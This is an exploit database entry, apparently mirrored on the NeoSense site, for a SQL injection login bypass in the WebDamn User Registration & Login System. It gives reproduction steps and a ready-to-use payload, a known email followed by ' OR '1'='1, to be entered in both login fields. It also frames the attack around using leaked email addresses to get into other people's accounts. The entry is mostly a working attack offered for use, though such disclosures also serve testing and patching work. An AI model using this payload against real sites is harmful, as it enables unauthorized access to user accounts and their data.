[] NeoSense
E X P L O I T S
title author type platform port cve id

WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass

Author: Aakash Madaan
type: webapps
platform: multiple
port: 
date_added: 2020-12-02 
date_updated: 2020-12-02 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass
# Date: 18-11-2020
# Exploit Author: Aakash Madaan
# Vendor Homepage: https://webdamn.com/
# Software Link : https://webdamn.com/user-management-system-with-php-mysql/
# Version: N/A (Default)
# Tested on: Windows 10 professional

Steps to reproduce:
1. Open user login page using following URl:
-> http://localhost/login.php <http://localhost/login.html>

2. If attacker get access to valid email address ( leaked data or by any
other means) then he/she can use the email address as follows:
Payload: <email>' OR '1'='1
NOTE: Use the above payload in both username and password fields

3. Server accepts the payload and the attacker is able to bypass the user
login panel with only email address.
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.